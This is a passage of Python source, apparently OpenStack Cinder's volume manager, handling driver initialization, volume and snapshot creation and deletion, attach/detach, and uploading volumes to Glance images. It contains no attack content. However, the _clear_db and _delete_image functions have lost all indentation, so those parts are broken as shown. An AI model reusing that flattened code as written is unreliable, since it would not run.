                                              {'status': 'in-use'})
        # All other cleanups are processed by parent class CleanableManager
    except Exception:
        LOG.exception(_LE("Error during re-export on driver init."),
                      resource=volume)
        return

    self.driver.set_throttle()

    # at this point the driver is considered initialized.
    # NOTE(jdg): Careful though because that doesn't mean
    # that an entry exists in the service table
    self.driver.set_initialized()

    # Keep the image tmp file clean when init host.
    backend_name = vol_utils.extract_host(self.service_topic_queue)
    image_utils.cleanup_temporary_file(backend_name)

    # collect and publish service capabilities
    self.publish_service_capabilities(ctxt)
    LOG.info(_LI("Driver initialization completed successfully."),
             resource={'type': 'driver',
                       'id': self.driver.__class__.__name__})

    # Make sure to call CleanableManager to do the cleanup
    super(VolumeManager, self).init_host(added_to_cluster=added_to_cluster,
                                         **kwargs)
def init_host_with_rpc(self):
    """Finish initialization that needs RPC to be available.

    Reads driver stats and records the service's replication status
    (enabled/disabled) unless the service is already failed over.
    """
    LOG.info(_LI("Initializing RPC dependent components of volume "
                 "driver %(driver_name)s (%(version)s)"),
             {'driver_name': self.driver.__class__.__name__,
              'version': self.driver.get_version()})

    try:
        # Make sure the driver is initialized first
        utils.log_unsupported_driver_warning(self.driver)
        utils.require_driver_initialized(self.driver)
    except exception.DriverNotInitialized:
        LOG.error(_LE("Cannot complete RPC initialization because "
                      "driver isn't initialized properly."),
                  resource={'type': 'driver',
                            'id': self.driver.__class__.__name__})
        return

    stats = self.driver.get_volume_stats(refresh=True)
    svc_host = vol_utils.extract_host(self.host, 'backend')
    try:
        service = objects.Service.get_by_args(
            context.get_admin_context(),
            svc_host,
            constants.VOLUME_BINARY)
    except exception.ServiceNotFound:
        with excutils.save_and_reraise_exception():
            LOG.error(_LE("Service not found for updating "
                          "replication_status."))

    # Do not clobber the status of a service that has failed over.
    if service.replication_status != (
            fields.ReplicationStatus.FAILED_OVER):
        if stats and stats.get('replication_enabled', False):
            service.replication_status = fields.ReplicationStatus.ENABLED
        else:
            service.replication_status = fields.ReplicationStatus.DISABLED

    service.save()
    LOG.info(_LI("Driver post RPC initialization completed successfully."),
             resource={'type': 'driver',
                       'id': self.driver.__class__.__name__})
def _do_cleanup(self, ctxt, vo_resource):
    """Clean up one leftover resource found at startup.

    :param ctxt: working context
    :param vo_resource: versioned object (Volume or Snapshot) whose
        status indicates an interrupted operation
    :returns: True when this method already cleaned the worker entry
        itself (volume delete path), otherwise None
    """
    if isinstance(vo_resource, objects.Volume):
        if vo_resource.status == 'downloading':
            self.driver.clear_download(ctxt, vo_resource)

        elif vo_resource.status == 'uploading':
            # Set volume status to available or in-use.
            self.db.volume_update_status_based_on_attachment(
                ctxt, vo_resource.id)

        elif vo_resource.status == 'deleting':
            if CONF.volume_service_inithost_offload:
                # Offload all the pending volume delete operations to the
                # threadpool to prevent the main volume service thread
                # from being blocked.
                self._add_to_threadpool(self.delete_volume, ctxt,
                                        vo_resource, cascade=True)
            else:
                # By default, delete volumes sequentially
                self.delete_volume(ctxt, vo_resource, cascade=True)
            # We signal that we take care of cleaning the worker ourselves
            # (with set_workers decorator in delete_volume method) so
            # do_cleanup method doesn't need to remove it.
            return True

    # For Volume creating and downloading and for Snapshot downloading
    # statuses we have to set status to error
    if vo_resource.status in ('creating', 'downloading'):
        vo_resource.status = 'error'
        vo_resource.save()
def is_working(self):
    """Return if Manager is ready to accept requests.

    This is to inform Service class that in case of volume driver
    initialization failure the manager is actually down and not ready to
    accept any requests.

    :returns: the driver's initialized flag
    """
    return self.driver.initialized
def _set_resource_host(self, resource):
    """Set the host field on the DB to our own when we are clustered.

    :param resource: clustered resource whose host may need rewriting;
        the pool suffix of the original host is preserved
    """
    if (resource.is_clustered and
            not vol_utils.hosts_are_equivalent(resource.host, self.host)):
        pool = vol_utils.extract_host(resource.host, 'pool')
        resource.host = vol_utils.append_host(self.host, pool)
        resource.save()
@objects.Volume.set_workers
def create_volume(self, context, volume, request_spec=None,
                  filter_properties=None, allow_reschedule=True):
    """Creates the volume.

    Builds and runs the taskflow create-volume flow, serializing
    against deletion of the source snapshot/volume when the new volume
    is created from one.

    :param context: request context
    :param volume: Volume object to create
    :param request_spec: scheduler request spec (optional)
    :param filter_properties: scheduler filter properties (optional)
    :param allow_reschedule: let the flow reschedule to another backend
        on failure
    :returns: the new volume's id
    """
    # Log about unsupported drivers
    utils.log_unsupported_driver_warning(self.driver)

    # Make sure the host in the DB matches our own when clustered
    self._set_resource_host(volume)

    context_elevated = context.elevated()
    if filter_properties is None:
        filter_properties = {}

    if request_spec is None:
        request_spec = objects.RequestSpec()

    try:
        # NOTE(flaper87): Driver initialization is
        # verified by the task itself.
        flow_engine = create_volume.get_flow(
            context_elevated,
            self,
            self.db,
            self.driver,
            self.scheduler_rpcapi,
            self.host,
            volume,
            allow_reschedule,
            context,
            request_spec,
            filter_properties,
            image_volume_cache=self.image_volume_cache,
        )
    except Exception:
        msg = _("Create manager volume flow failed.")
        LOG.exception(msg, resource={'type': 'volume', 'id': volume.id})
        raise exception.CinderException(msg)

    # When creating from a snapshot or another volume, lock on the
    # source so it cannot be deleted while the flow runs.
    snapshot_id = request_spec.get('snapshot_id')
    source_volid = request_spec.get('source_volid')
    source_replicaid = request_spec.get('source_replicaid')

    if snapshot_id is not None:
        # Make sure the snapshot is not deleted until we are done with it.
        locked_action = "%s-%s" % (snapshot_id, 'delete_snapshot')
    elif source_volid is not None:
        # Make sure the volume is not deleted until we are done with it.
        locked_action = "%s-%s" % (source_volid, 'delete_volume')
    elif source_replicaid is not None:
        # Make sure the volume is not deleted until we are done with it.
        locked_action = "%s-%s" % (source_replicaid, 'delete_volume')
    else:
        locked_action = None

    def _run_flow():
        # This code executes create volume flow. If something goes wrong,
        # flow reverts all job that was done and reraises an exception.
        # Otherwise, all data that was generated by flow becomes available
        # in flow engine's storage.
        with flow_utils.DynamicLogListener(flow_engine, logger=LOG):
            flow_engine.run()

    # NOTE(dulek): Flag to indicate if volume was rescheduled. Used to
    # decide if allocated_capacity should be incremented.
    rescheduled = False

    try:
        if locked_action is None:
            _run_flow()
        else:
            with coordination.Lock(locked_action):
                _run_flow()
    finally:
        try:
            flow_engine.storage.fetch('refreshed')
        except tfe.NotFound:
            # If there's no vol_ref, then flow is reverted. Lets check out
            # if rescheduling occurred.
            try:
                rescheduled = flow_engine.storage.get_revert_result(
                    create_volume.OnFailureRescheduleTask.make_name(
                        [create_volume.ACTION]))
            except tfe.NotFound:
                pass

        if not rescheduled:
            # NOTE(dulek): Volume wasn't rescheduled so we need to update
            # volume stats as these are decremented on delete.
            self._update_allocated_capacity(volume)

    LOG.info(_LI("Created volume successfully."), resource=volume)
    return volume.id
def _check_is_our_resource(self, resource):
    """Verify the resource is managed by this backend, else raise Invalid.

    :param resource: a versioned object (volume, snapshot, ...) with a
        ``host`` field and a ``service_topic_queue``.
    :raises: exception.Invalid if the resource's backend does not match
        this service's backend.
    """
    if resource.host:
        res_backend = vol_utils.extract_host(resource.service_topic_queue)
        backend = vol_utils.extract_host(self.service_topic_queue)
        if res_backend != backend:
            # NOTE: obj_name() is a method on oslo versioned objects; it
            # must be called, otherwise the bound-method repr (not the
            # object type name) is interpolated into the message.
            msg = (_('Invalid %(resource)s: %(resource)s %(id)s is not '
                     'local to %(backend)s.') %
                   {'resource': resource.obj_name(), 'id': resource.id,
                    'backend': backend})
            raise exception.Invalid(msg)
@coordination.synchronized('{volume.id}-{f_name}')
@objects.Volume.set_workers
def delete_volume(self, context, volume, unmanage_only=False,
                  cascade=False):
    """Deletes and unexports volume.

    1. Delete a volume(normal case)
       Delete a volume and update quotas.

    2. Delete a migration volume
       If deleting the volume in a migration, we want to skip
       quotas but we need database updates for the volume.

    :param context: request context (elevated internally).
    :param volume: Volume object to delete.
    :param unmanage_only: if True, remove the volume from Cinder's
        control via driver.unmanage() instead of deleting backend data.
    :param cascade: if True, delete all of the volume's snapshots first;
        mutually exclusive with unmanage_only.
    """
    context = context.elevated()

    try:
        volume.refresh()
    except exception.VolumeNotFound:
        # NOTE(thingee): It could be possible for a volume to
        # be deleted when resuming deletes from init_host().
        LOG.debug("Attempted delete of non-existent volume: %s", volume.id)
        return

    # Charge quota against the volume's owning project, not the caller's.
    if context.project_id != volume.project_id:
        project_id = volume.project_id
    else:
        project_id = context.project_id

    if volume['attach_status'] == fields.VolumeAttachStatus.ATTACHED:
        # Volume is still attached, need to detach first
        raise exception.VolumeAttached(volume_id=volume.id)
    self._check_is_our_resource(volume)

    if unmanage_only and cascade:
        # This could be done, but is ruled out for now just
        # for simplicity.
        raise exception.Invalid(
            reason=_("Unmanage and cascade delete options "
                     "are mutually exclusive."))

    # The status 'deleting' is not included, because it only applies to
    # the source volume to be deleted after a migration. No quota
    # needs to be handled for it.
    is_migrating = volume.migration_status not in (None, 'error',
                                                   'success')
    is_migrating_dest = (is_migrating and
                         volume.migration_status.startswith(
                             'target:'))
    notification = "delete.start"
    if unmanage_only:
        notification = "unmanage.start"
    self._notify_about_volume_usage(context, volume, notification)
    try:
        # NOTE(flaper87): Verify the driver is enabled
        # before going forward. The exception will be caught
        # and the volume status updated.
        utils.require_driver_initialized(self.driver)

        self.driver.remove_export(context, volume)
        if unmanage_only:
            self.driver.unmanage(volume)
        elif cascade:
            LOG.debug('Performing cascade delete.')
            snapshots = objects.SnapshotList.get_all_for_volume(context,
                                                                volume.id)
            # All snapshots must already be in 'deleting' state (set by
            # the API layer); anything else aborts the cascade.
            for s in snapshots:
                if s.status != 'deleting':
                    self._clear_db(context, is_migrating_dest, volume,
                                   'error_deleting')

                    msg = (_("Snapshot %(id)s was found in state "
                             "%(state)s rather than 'deleting' during "
                             "cascade delete.") % {'id': s.id,
                                                   'state': s.status})
                    raise exception.InvalidSnapshot(reason=msg)

                self.delete_snapshot(context, s)

            LOG.debug('Snapshots deleted, issuing volume delete')
            self.driver.delete_volume(volume)
        else:
            self.driver.delete_volume(volume)
    except exception.VolumeIsBusy:
        LOG.error(_LE("Unable to delete busy volume."),
                  resource=volume)
        # If this is a destination volume, we have to clear the database
        # record to avoid user confusion.
        self._clear_db(context, is_migrating_dest, volume,
                       'available')
        return
    except Exception:
        with excutils.save_and_reraise_exception():
            # If this is a destination volume, we have to clear the
            # database record to avoid user confusion.
            new_status = 'error_deleting'
            if unmanage_only is True:
                new_status = 'error_unmanaging'

            self._clear_db(context, is_migrating_dest, volume,
                           new_status)

    # If deleting source/destination volume in a migration, we should
    # skip quotas.
    if not is_migrating:
        # Get reservations
        try:
            reservations = None
            if volume.status != 'error_managing_deleting':
                reserve_opts = {'volumes': -1,
                                'gigabytes': -volume.size}
                QUOTAS.add_volume_type_opts(context,
                                            reserve_opts,
                                            volume.volume_type_id)
                reservations = QUOTAS.reserve(context,
                                              project_id=project_id,
                                              **reserve_opts)
        except Exception:
            # Best effort: quota bookkeeping failure must not block the
            # volume deletion itself.
            LOG.exception(_LE("Failed to update usages deleting volume."),
                          resource=volume)

    # Delete glance metadata if it exists
    self.db.volume_glance_metadata_delete_by_volume(context, volume.id)

    volume.destroy()

    # If deleting source/destination volume in a migration, we should
    # skip quotas.
    if not is_migrating:
        notification = "delete.end"
        if unmanage_only:
            notification = "unmanage.end"
        self._notify_about_volume_usage(context, volume, notification)

        # Commit the reservations
        if reservations:
            QUOTAS.commit(context, reservations, project_id=project_id)

    # Decrement this backend's allocated capacity for the volume's pool.
    pool = vol_utils.extract_host(volume.host, 'pool')
    if pool is None:
        # Legacy volume, put them into default pool
        pool = self.driver.configuration.safe_get(
            'volume_backend_name') or vol_utils.extract_host(
                volume.host, 'pool', True)
    size = volume.size

    try:
        self.stats['pools'][pool]['allocated_capacity_gb'] -= size
    except KeyError:
        # First time we see this pool in stats.
        self.stats['pools'][pool] = dict(
            allocated_capacity_gb=-size)
    self.publish_service_capabilities(context)

    msg = _LI("Deleted volume successfully.")
    if unmanage_only:
        msg = _LI("Unmanaged volume successfully.")
    LOG.info(msg, resource=volume)
def _clear_db(self, context, is_migrating_dest, volume_ref, status):
# This method is called when driver.unmanage() or
# driver.delete_volume() fails in delete_volume(), so it is already
# in the exception handling part.
if is_migrating_dest:
volume_ref.destroy()
LOG.error(_LE("Unable to delete the destination volume "
"during volume migration, (NOTE: database "
"record needs to be deleted)."), resource=volume_ref)
else:
volume_ref.status = status
volume_ref.save()
@objects.Snapshot.set_workers
def create_snapshot(self, context, snapshot):
    """Creates and exports the snapshot.

    :param context: request context (elevated internally).
    :param snapshot: Snapshot object to create on the backend.
    :returns: the snapshot id.
    :raises: exception.MetadataCopyFailure if glance metadata could not
        be copied to the snapshot of a bootable volume.
    """
    context = context.elevated()

    self._notify_about_snapshot_usage(
        context, snapshot, "create.start")

    try:
        # NOTE(flaper87): Verify the driver is enabled
        # before going forward. The exception will be caught
        # and the snapshot status updated.
        utils.require_driver_initialized(self.driver)

        # Pass context so that drivers that want to use it, can,
        # but it is not a requirement for all drivers.
        snapshot.context = context

        model_update = self.driver.create_snapshot(snapshot)
        if model_update:
            snapshot.update(model_update)
            snapshot.save()
    except Exception:
        with excutils.save_and_reraise_exception():
            # Mark the snapshot as errored before re-raising.
            snapshot.status = fields.SnapshotStatus.ERROR
            snapshot.save()

    # For bootable volumes, copy the glance image metadata onto the
    # snapshot so volumes created from it are also bootable.
    vol_ref = self.db.volume_get(context, snapshot.volume_id)
    if vol_ref.bootable:
        try:
            self.db.volume_glance_metadata_copy_to_snapshot(
                context, snapshot.id, snapshot.volume_id)
        except exception.GlanceMetadataNotFound:
            # If volume is not created from image, No glance metadata
            # would be available for that volume in
            # volume glance metadata table
            pass
        except exception.CinderException as ex:
            LOG.exception(_LE("Failed updating snapshot"
                              " metadata using the provided volumes"
                              " %(volume_id)s metadata"),
                          {'volume_id': snapshot.volume_id},
                          resource=snapshot)
            snapshot.status = fields.SnapshotStatus.ERROR
            snapshot.save()
            raise exception.MetadataCopyFailure(reason=six.text_type(ex))

    snapshot.status = fields.SnapshotStatus.AVAILABLE
    snapshot.progress = '100%'
    snapshot.save()

    self._notify_about_snapshot_usage(context, snapshot, "create.end")
    LOG.info(_LI("Create snapshot completed successfully"),
             resource=snapshot)
    return snapshot.id
@coordination.synchronized('{snapshot.id}-{f_name}')
def delete_snapshot(self, context, snapshot, unmanage_only=False):
    """Deletes and unexports snapshot.

    :param context: request context (elevated internally).
    :param snapshot: Snapshot object to remove.
    :param unmanage_only: if True, remove the snapshot from Cinder's
        control via driver.unmanage_snapshot() instead of deleting
        backend data.
    """
    context = context.elevated()
    snapshot._context = context
    project_id = snapshot.project_id

    self._notify_about_snapshot_usage(
        context, snapshot, "delete.start")

    try:
        # NOTE(flaper87): Verify the driver is enabled
        # before going forward. The exception will be caught
        # and the snapshot status updated.
        utils.require_driver_initialized(self.driver)

        # Pass context so that drivers that want to use it, can,
        # but it is not a requirement for all drivers.
        snapshot.context = context
        snapshot.save()

        if unmanage_only:
            self.driver.unmanage_snapshot(snapshot)
        else:
            self.driver.delete_snapshot(snapshot)
    except exception.SnapshotIsBusy:
        # Busy snapshot stays in place; flip it back to AVAILABLE.
        LOG.error(_LE("Delete snapshot failed, due to snapshot busy."),
                  resource=snapshot)
        snapshot.status = fields.SnapshotStatus.AVAILABLE
        snapshot.save()
        return
    except Exception:
        with excutils.save_and_reraise_exception():
            snapshot.status = fields.SnapshotStatus.ERROR_DELETING
            snapshot.save()

    # Get reservations
    try:
        if CONF.no_snapshot_gb_quota:
            reserve_opts = {'snapshots': -1}
        else:
            reserve_opts = {
                'snapshots': -1,
                'gigabytes': -snapshot.volume_size,
            }
        volume_ref = self.db.volume_get(context, snapshot.volume_id)
        QUOTAS.add_volume_type_opts(context,
                                    reserve_opts,
                                    volume_ref.get('volume_type_id'))
        reservations = QUOTAS.reserve(context,
                                      project_id=project_id,
                                      **reserve_opts)
    except Exception:
        # Quota bookkeeping failure must not block snapshot deletion.
        reservations = None
        LOG.exception(_LE("Update snapshot usages failed."),
                      resource=snapshot)
    self.db.volume_glance_metadata_delete_by_snapshot(context, snapshot.id)
    snapshot.destroy()
    self._notify_about_snapshot_usage(context, snapshot, "delete.end")

    # Commit the reservations
    if reservations:
        QUOTAS.commit(context, reservations, project_id=project_id)

    msg = _LI("Delete snapshot completed successfully.")
    if unmanage_only:
        msg = _LI("Unmanage snapshot completed successfully.")
    LOG.info(msg, resource=snapshot)
@coordination.synchronized('{volume_id}')
def attach_volume(self, context, volume_id, instance_uuid, host_name,
                  mountpoint, mode, volume=None):
    """Updates db to show volume is attached.

    :param context: request context.
    :param volume_id: id of the volume being attached.
    :param instance_uuid: UUID of the attaching instance, or None for a
        host attach.
    :param host_name: name of the attaching host, or None for an
        instance attach.
    :param mountpoint: device path where the volume is exposed.
    :param mode: attach mode, 'rw' or 'ro'.
    :param volume: Volume object; looked up from volume_id for older
        RPC clients when not supplied.
    :returns: the VolumeAttachment object tracking this attachment.
    """
    # FIXME(lixiaoy1): Remove this in v4.0 of RPC API.
    if volume is None:
        # For older clients, mimic the old behavior and look
        # up the volume by its volume_id.
        volume = objects.Volume.get_by_id(context, volume_id)

    # Get admin_metadata. This needs admin context.
    with volume.obj_as_admin():
        volume_metadata = volume.admin_metadata
    # check the volume status before attaching
    if volume.status == 'attaching':
        if (volume_metadata.get('attached_mode') and
                volume_metadata.get('attached_mode') != mode):
            raise exception.InvalidVolume(
                reason=_("being attached by different mode"))

    if (volume.status == 'in-use' and not volume.multiattach
            and not volume.migration_status):
        raise exception.InvalidVolume(
            reason=_("volume is already attached"))

    host_name_sanitized = utils.sanitize_hostname(
        host_name) if host_name else None
    # Find existing attachments by instance, or by host when there is
    # no instance uuid.
    if instance_uuid:
        attachments = (
            VA_LIST.get_all_by_instance_uuid(
                context, instance_uuid))
    else:
        attachments = (
            VA_LIST.get_all_by_host(
                context, host_name_sanitized))
    if attachments:
        # check if volume<->instance mapping is already tracked in DB
        for attachment in attachments:
            if attachment['volume_id'] == volume_id:
                # Already attached to this instance/host: idempotent.
                volume.status = 'in-use'
                volume.save()
                return attachment

    self._notify_about_volume_usage(context, volume,
                                    "attach.start")

    attachment = volume.begin_attach(mode)

    if instance_uuid and not uuidutils.is_uuid_like(instance_uuid):
        attachment.attach_status = (
            fields.VolumeAttachStatus.ERROR_ATTACHING)
        attachment.save()
        raise exception.InvalidUUID(uuid=instance_uuid)

    if volume_metadata.get('readonly') == 'True' and mode != 'ro':
        attachment.attach_status = (
            fields.VolumeAttachStatus.ERROR_ATTACHING)
        attachment.save()
        # Surface a user-visible message for the read-only violation.
        self.message_api.create(
            context, defined_messages.EventIds.ATTACH_READONLY_VOLUME,
            context.project_id, resource_type=resource_types.VOLUME,
            resource_uuid=volume.id)
        raise exception.InvalidVolumeAttachMode(mode=mode,
                                                volume_id=volume.id)

    try:
        # NOTE(flaper87): Verify the driver is enabled
        # before going forward. The exception will be caught
        # and the volume status updated.
        utils.require_driver_initialized(self.driver)

        LOG.info(_LI('Attaching volume %(volume_id)s to instance '
                     '%(instance)s at mountpoint %(mount)s on host '
                     '%(host)s.'),
                 {'volume_id': volume_id, 'instance': instance_uuid,
                  'mount': mountpoint, 'host': host_name_sanitized},
                 resource=volume)
        self.driver.attach_volume(context,
                                  volume,
                                  instance_uuid,
                                  host_name_sanitized,
                                  mountpoint)
    except Exception:
        with excutils.save_and_reraise_exception():
            attachment.attach_status = (
                fields.VolumeAttachStatus.ERROR_ATTACHING)
            attachment.save()

    volume = attachment.finish_attach(
        instance_uuid,
        host_name_sanitized,
        mountpoint,
        mode)

    self._notify_about_volume_usage(context, volume, "attach.end")
    LOG.info(_LI("Attach volume completed successfully."),
             resource=volume)
    return attachment
@coordination.synchronized('{volume_id}-{f_name}')
def detach_volume(self, context, volume_id, attachment_id=None,
                  volume=None):
    """Updates db to show volume is detached.

    :param context: request context.
    :param volume_id: id of the volume being detached.
    :param attachment_id: id of the attachment to remove; may be None
        only when the volume has at most one attachment.
    :param volume: Volume object; looked up from volume_id for older
        RPC clients when not supplied.
    """
    # TODO(vish): refactor this into a more general "unreserve"
    # FIXME(lixiaoy1): Remove this in v4.0 of RPC API.
    if volume is None:
        # For older clients, mimic the old behavior and look up the volume
        # by its volume_id.
        volume = objects.Volume.get_by_id(context, volume_id)

    if attachment_id:
        try:
            attachment = objects.VolumeAttachment.get_by_id(context,
                                                            attachment_id)
        except exception.VolumeAttachmentNotFound:
            LOG.info(_LI("Volume detach called, but volume not attached."),
                     resource=volume)
            # We need to make sure the volume status is set to the correct
            # status.  It could be in detaching status now, and we don't
            # want to leave it there.
            volume.finish_detach(attachment_id)
            return
    else:
        # We can try and degrade gracefully here by trying to detach
        # a volume without the attachment_id here if the volume only has
        # one attachment.  This is for backwards compatibility.
        attachments = volume.volume_attachment
        if len(attachments) > 1:
            # There are more than 1 attachments for this volume
            # we have to have an attachment id.
            msg = _("Detach volume failed: More than one attachment, "
                    "but no attachment_id provided.")
            LOG.error(msg, resource=volume)
            raise exception.InvalidVolume(reason=msg)
        elif len(attachments) == 1:
            attachment = attachments[0]
        else:
            # there aren't any attachments for this volume.
            # so set the status to available and move on.
            LOG.info(_LI("Volume detach called, but volume not attached."),
                     resource=volume)
            volume.status = 'available'
            volume.attach_status = fields.VolumeAttachStatus.DETACHED
            volume.save()
            return

    self._notify_about_volume_usage(context, volume, "detach.start")
    try:
        # NOTE(flaper87): Verify the driver is enabled
        # before going forward. The exception will be caught
        # and the volume status updated.
        utils.require_driver_initialized(self.driver)

        LOG.info(_LI('Detaching volume %(volume_id)s from instance '
                     '%(instance)s.'),
                 {'volume_id': volume_id,
                  'instance': attachment.get('instance_uuid')},
                 resource=volume)
        self.driver.detach_volume(context, volume, attachment)
    except Exception:
        with excutils.save_and_reraise_exception():
            self.db.volume_attachment_update(
                context, attachment.get('id'), {
                    'attach_status':
                        fields.VolumeAttachStatus.ERROR_DETACHING})

    # NOTE(jdg): We used to do an ensure export here to
    # catch upgrades while volumes were attached (E->F)
    # this was necessary to convert in-use volumes from
    # int ID's to UUID's.  Don't need this any longer

    # We're going to remove the export here
    # (delete the iscsi target)
    try:
        utils.require_driver_initialized(self.driver)
        self.driver.remove_export(context.elevated(), volume)
    except exception.DriverNotInitialized:
        with excutils.save_and_reraise_exception():
            LOG.exception(_LE("Detach volume failed, due to "
                              "uninitialized driver."),
                          resource=volume)
    except Exception as ex:
        LOG.exception(_LE("Detach volume failed, due to "
                          "remove-export failure."),
                      resource=volume)
        raise exception.RemoveExportException(volume=volume_id,
                                              reason=six.text_type(ex))

    volume.finish_detach(attachment.id)
    self._notify_about_volume_usage(context, volume, "detach.end")
    LOG.info(_LI("Detach volume completed successfully."), resource=volume)
def _create_image_cache_volume_entry(self, ctx, volume_ref,
                                     image_id, image_meta):
    """Create a new image-volume and cache entry for it.

    This assumes that the image has already been downloaded and stored
    in the volume described by the volume_ref.
    """
    clone = None
    try:
        # Make room in the cache first; skip quietly when we cannot.
        have_space = self.image_volume_cache.ensure_space(ctx, volume_ref)
        if not have_space:
            LOG.warning(_LW('Unable to ensure space for image-volume in'
                            ' cache. Will skip creating entry for image'
                            ' %(image)s on %(service)s.'),
                        {'image': image_id,
                         'service': volume_ref.service_topic_queue})
            return

        clone = self._clone_image_volume(ctx, volume_ref, image_meta)
        if not clone:
            LOG.warning(_LW('Unable to clone image_volume for image '
                            '%(image_id)s will not create cache entry.'),
                        {'image_id': image_id})
            return

        self.image_volume_cache.create_cache_entry(ctx, clone, image_id,
                                                   image_meta)
    except exception.CinderException as e:
        LOG.warning(_LW('Failed to create new image-volume cache entry.'
                        ' Error: %(exception)s'), {'exception': e})
        # Clean up a clone that made it partway through.
        if clone:
            self.delete_volume(ctx, clone)
def _clone_image_volume(self, ctx, volume, image_meta):
    """Clone ``volume`` into a new read-only image-backed volume.

    Reserves quota for the clone, creates the volume record, runs
    create_volume() with rescheduling disabled, then marks the result
    read-only.

    :param ctx: request context the clone is owned by.
    :param volume: source volume to clone.
    :param image_meta: metadata of the image this clone will back.
    :returns: the new Volume object, or None on any failure.
    """
    volume_type_id = volume.get('volume_type_id')
    reserve_opts = {'volumes': 1, 'gigabytes': volume.size}
    QUOTAS.add_volume_type_opts(ctx, reserve_opts, volume_type_id)
    reservations = QUOTAS.reserve(ctx, **reserve_opts)

    try:
        # Copy the source volume's fields, minus the ones a clone must
        # not inherit (id, status, attachment info, ...).
        new_vol_values = {k: volume[k] for k in set(volume.keys()) -
                          self._VOLUME_CLONE_SKIP_PROPERTIES}
        new_vol_values['volume_type_id'] = volume_type_id
        new_vol_values['attach_status'] = (
            fields.VolumeAttachStatus.DETACHED)
        new_vol_values['status'] = 'creating'
        new_vol_values['project_id'] = ctx.project_id
        new_vol_values['display_name'] = 'image-%s' % image_meta['id']
        new_vol_values['source_volid'] = volume.id

        LOG.debug('Creating image volume entry: %s.', new_vol_values)
        image_volume = objects.Volume(context=ctx, **new_vol_values)
        image_volume.create()
    except Exception as ex:
        LOG.exception(_LE('Create clone_image_volume: %(volume_id)s'
                          'for image %(image_id)s, '
                          'failed (Exception: %(except)s)'),
                      {'volume_id': volume.id,
                       'image_id': image_meta['id'],
                       'except': ex})
        QUOTAS.rollback(ctx, reservations)
        return

    QUOTAS.commit(ctx, reservations,
                  project_id=new_vol_values['project_id'])

    try:
        self.create_volume(ctx, image_volume, allow_reschedule=False)
        image_volume = objects.Volume.get_by_id(ctx, image_volume.id)
        if image_volume.status != 'available':
            raise exception.InvalidVolume(_('Volume is not available.'))

        self.db.volume_admin_metadata_update(ctx.elevated(),
                                             image_volume.id,
                                             {'readonly': 'True'},
                                             False)
        return image_volume
    except exception.CinderException:
        LOG.exception(_LE('Failed to clone volume %(volume_id)s for '
                          'image %(image_id)s.'),
                      {'volume_id': volume.id,
                       'image_id': image_meta['id']})
        try:
            self.delete_volume(ctx, image_volume)
        except exception.CinderException:
            # BUGFIX: report the id of the image volume we failed to
            # delete, not the id of the source volume.
            LOG.exception(_LE('Could not delete the image volume %(id)s.'),
                          {'id': image_volume.id})
        return
def _clone_image_volume_and_add_location(self, ctx, volume, image_service,
                                         image_meta):
    """Create a cloned volume and register its location to the image.

    :returns: True when the clone was created and its ``cinder://`` URI
        was registered as a location on the glance image; False
        otherwise (including when the image format is unsupported).
    """
    # Only raw/bare images can be backed by a volume location.
    if (image_meta['disk_format'] != 'raw' or
            image_meta['container_format'] != 'bare'):
        return False

    # Optionally create the image volume under the internal tenant.
    image_volume_context = ctx
    if self.driver.configuration.image_upload_use_internal_tenant:
        internal_ctx = context.get_internal_tenant_context()
        if internal_ctx:
            image_volume_context = internal_ctx

    image_volume = self._clone_image_volume(image_volume_context,
                                            volume,
                                            image_meta)
    if not image_volume:
        return False

    # The image_owner metadata should be set before uri is added to
    # the image so glance cinder store can check its owner.
    image_volume_meta = {'image_owner': ctx.project_id}
    self.db.volume_metadata_update(image_volume_context,
                                   image_volume.id,
                                   image_volume_meta,
                                   False)

    uri = 'cinder://%s' % image_volume.id
    image_registered = None
    try:
        image_registered = image_service.add_location(
            ctx, image_meta['id'], uri, {})
    except (exception.NotAuthorized, exception.Invalid,
            exception.NotFound):
        LOG.exception(_LE('Failed to register image volume location '
                          '%(uri)s.'), {'uri': uri})

    if not image_registered:
        # Registration failed: remove the now-useless clone.
        LOG.warning(_LW('Registration of image volume URI %(uri)s '
                        'to image %(image_id)s failed.'),
                    {'uri': uri, 'image_id': image_meta['id']})
        try:
            self.delete_volume(image_volume_context, image_volume)
        except exception.CinderException:
            LOG.exception(_LE('Could not delete failed image volume '
                              '%(id)s.'), {'id': image_volume.id})
        return False

    image_volume_meta['glance_image_id'] = image_meta['id']
    self.db.volume_metadata_update(image_volume_context,
                                   image_volume.id,
                                   image_volume_meta,
                                   False)
    return True
def copy_volume_to_image(self, context, volume_id, image_meta):
    """Uploads the specified volume to Glance.

    image_meta is a dictionary containing the following keys:
    'id', 'container_format', 'disk_format'

    :param context: request context.
    :param volume_id: id of the volume to upload.
    :param image_meta: metadata of the target glance image.
    """
    payload = {'volume_id': volume_id, 'image_id': image_meta['id']}
    image_service = None
    # BUGFIX: pre-initialize so the except/finally paths below can
    # safely reference 'volume' even when the volume lookup itself
    # raises; previously that produced a NameError which masked the
    # original exception.
    volume = None
    try:
        volume = objects.Volume.get_by_id(context, volume_id)

        # NOTE(flaper87): Verify the driver is enabled
        # before going forward. The exception will be caught
        # and the volume status updated.
        utils.require_driver_initialized(self.driver)

        image_service, image_id = \
            glance.get_remote_image_service(context, image_meta['id'])
        if (self.driver.configuration.image_upload_use_cinder_backend
                and self._clone_image_volume_and_add_location(
                    context, volume, image_service, image_meta)):
            LOG.debug("Registered image volume location to glance "
                      "image-id: %(image_id)s.",
                      {'image_id': image_meta['id']},
                      resource=volume)
        else:
            self.driver.copy_volume_to_image(context, volume,
                                             image_service, image_meta)
            LOG.debug("Uploaded volume to glance image-id: %(image_id)s.",
                      {'image_id': image_meta['id']},
                      resource=volume)
    except Exception as error:
        LOG.error(_LE("Upload volume to image encountered an error "
                      "(image-id: %(image_id)s)."),
                  {'image_id': image_meta['id']},
                  resource=volume)
        if image_service is not None:
            # Deletes the image if it is in queued or saving state
            self._delete_image(context, image_meta['id'], image_service)
        with excutils.save_and_reraise_exception():
            payload['message'] = six.text_type(error)
            if isinstance(error, exception.ImageLimitExceeded):
                self.message_api.create(
                    context,
                    defined_messages.EventIds.IMAGE_FROM_VOLUME_OVER_QUOTA,
                    context.project_id,
                    resource_type=resource_types.VOLUME,
                    resource_uuid=volume_id)
    finally:
        self.db.volume_update_status_based_on_attachment(context,
                                                         volume_id)
    LOG.info(_LI("Copy volume to image completed successfully."),
             resource=volume)
def _delete_image(self, context, image_id, image_service):
"""Deletes an image stuck in queued or saving state."""
try:
image_meta = image_service.show(context, image_id)
image_status = image_meta.get('status')
